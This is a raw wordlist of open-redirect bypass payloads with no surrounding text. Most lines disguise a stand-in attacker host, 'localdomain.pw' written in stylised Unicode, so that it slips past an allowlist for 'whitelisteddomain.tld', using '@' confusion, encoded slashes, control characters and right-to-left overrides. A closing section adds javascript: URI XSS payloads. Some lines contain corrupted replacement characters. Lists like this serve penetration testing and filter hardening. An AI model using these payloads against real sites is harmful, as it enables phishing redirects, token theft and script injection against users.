|
|
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
|
|
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
|
|
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
|
|
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
|
|
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
|
|
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
|
|
//https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
|
|
//https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
|
|
///Ⓛ𝐨𝗰𝐀��ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
//https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
//www.whitelisteddomain.tld@https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
|
|
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
/https://Ⓛ𝐨𝗰𝐀��ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
/https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
/https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
/%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
///%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
///%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
////%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
////%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
///%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
///%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
////%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
////%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/https://%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
http:Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https:Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
|
|
\/\/Ⓛ𝐨𝗰��𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
/\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ%00。Pⓦ
|
|
https://www.whitelisteddomain.tld/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
〱Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
〵Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
ゝⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/〱Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/〵Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/ゝⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
<>//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
|
|
https://:@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
|
|
http://Ⓛ𝐨𝗰𝐀��ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
|
|
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
|
|
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld⁺@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld⁺@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀��ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
http://www.whitelisteddomain.tld+&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
|
|
http://www.whitelisteddomain.tld⁺&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#⁺@www.whitelisteddomain.tld/
|
|
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
|
|
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld⁺@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//XY>.7d8T\205pZM@www.whitelisteddomain.tld⁺@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//www.whitelisteddomain.tld+&@Ⓛ��𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
|
|
//www.whitelisteddomain.tld⁺&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#⁺@www.whitelisteddomain.tld/
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
|
|
//;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
http://;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
http://﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.www.whitelisteddomain.tld/
|
|
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%5c%5c.www.whitelisteddomain.tld/
|
|
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%3F.www.whitelisteddomain.tld/
|
|
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23.www.whitelisteddomain.tld/
|
|
http://www.whitelisteddomain.tld:80%40Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
http://www.whitelisteddomain.tld%2eⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
/https:/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
https:/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
/http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/%2f%2fⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//%2f%2fⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
/http:/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
http:/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
http://.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
///\;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
///\﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
/////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
http://www.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.www.whitelisteddomain.tld
|
|
%01https://Ⓛ𝐨��𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
www.whitelisteddomain.tld;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
www.whitelisteddomain.tld﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://www.whitelisteddomain.tld;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://www.whitelisteddomain.tld﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
http:%0a%0dⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://%0a%0dⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
|
|
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
|
|
|
|
## Additional Advanced Techniques
|
|
javascript:alert(document.domain)//://
|
|
/#//localdomain.pw
|
|
#//localdomain.pw
|
|
/#//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
#//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https%3A/localdomain.pw
|
|
https%3A/Ⓛ𝐨𝗰��𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.www.whitelisteddomain.tld/
|
|
https%3A/:@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
|
|
https%3A/;@localdomain.pw
|
|
https%3A/﹔@localdomain.pw
|
|
https%3A/www.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.www.whitelisteddomain.tld
|
|
javascript:%250Aalert(1)
|
|
javascript:alert(1)//https://www.whitelisteddomain.tld
|
|
°/localdomain.pw
|
|
°/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
////localdomain。pw
|
|
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//localdomain.pw?
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ?
|
|
//.@.@localdomain.pw
|
|
//.@.@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
javascript:new%20Function`al\ert\`1\``;
|
|
%09Jav%09ascript:alert(1)
|
|
https://localdomain。pw\ᵗwww.whitelisteddomain.tld
|
|
//localdomain。pw\ᵗwww.whitelisteddomain.tld
|
|
https://www.whitelisteddomain.tld。₨/
|
|
//www.whitelisteddomain.tld。₨/
|
|
https://localdomain.pw\udfff@www.whitelisteddomain.tld/
|
|
//localdomain.pw\udfff@www.whitelisteddomain.tld/
|
|
https://localdomain.pw�@www.whitelisteddomain.tld/
|
|
//localdomain.pw�@www.whitelisteddomain.tld/
|
|
https://www.whitelisteddomain.tld%40%E2%80%AE@wp.niamodlacol
|
|
https://www.whitelisteddomain.tld%40%E2%80%AE@localdomain.pw
|
|
https://www.whitelisteddomain.tld%40%E2%80%AE@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://www.whitelisteddomain.tld@%E2%80%AE@wp.niamodlacol
|
|
https://www.whitelisteddomain.tld@%E2%80%AE@localdomain.pw
|
|
https://www.whitelisteddomain.tld@%E2%80%AE@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://www.whitelisteddomain.tld@/%E2%80%AE@wp.niamodlacol
|
|
https://www.whitelisteddomain.tld@/%E2%80%AE@localdomain.pw
|
|
https://www.whitelisteddomain.tld@/%E2%80%AE@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://www.whitelisteddomain.tld@'#localdomain.pw
|
|
https://www.whitelisteddomain.tld@'#Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
javascript:alert(1)//localdomain.pw/
|
|
javascript:alert(1)//www.whitelisteddomain.tld/
|
|
Javascript://%E2%80%A9alert(618)
|
|
https://www.whitelisteddomain.tld%09.localdomain.pw
|
|
www.whitelisteddomain.tld%09.localdomain.pw
|
|
https://www.whitelisteddomain.tld%09.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
www.whitelisteddomain.tld%09.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://www.whitelisteddomain.tld%09。Ⓛ𝐨��𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
www.whitelisteddomain.tld%09。Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
https://www.whitelisteddomain.tld%252elocaldomain.pw
|
|
www.whitelisteddomain.tld%252elocaldomain.pw
|
|
https://www.whitelisteddomain.tld%252eⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
www.whitelisteddomain.tld%252eⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
%0A/localdomain.pw
|
|
%0A/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
/%2F/localdomain.pw
|
|
/%2F/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
%252F@localdomain.pw
|
|
%252F@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|
|
//localdomain.pw\@.www.whitelisteddomain.tld
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@.www.whitelisteddomain.tld
|
|
//localdomain.pw\\@.www.whitelisteddomain.tld
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\\@.www.whitelisteddomain.tld
|
|
//localdomain.pw%FF@www.whitelisteddomain.tld
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%FF@www.whitelisteddomain.tld
|
|
//localdomain.pw%23@www.whitelisteddomain.tld
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23@www.whitelisteddomain.tld
|
|
//www.whitelisteddomain.tld/../..%20.localdomain.pw
|
|
//www.whitelisteddomain.tld/../..%20.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
|